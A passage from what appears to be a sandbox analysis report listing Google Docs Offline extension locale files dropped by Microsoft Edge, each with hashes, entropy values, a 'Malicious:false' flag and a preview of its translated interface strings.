                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
